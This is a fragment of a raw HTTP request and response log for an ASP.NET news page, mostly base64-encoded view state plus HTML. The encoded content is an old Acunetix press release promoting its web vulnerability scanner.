WVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30642
Response Body - size: 30,642 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAg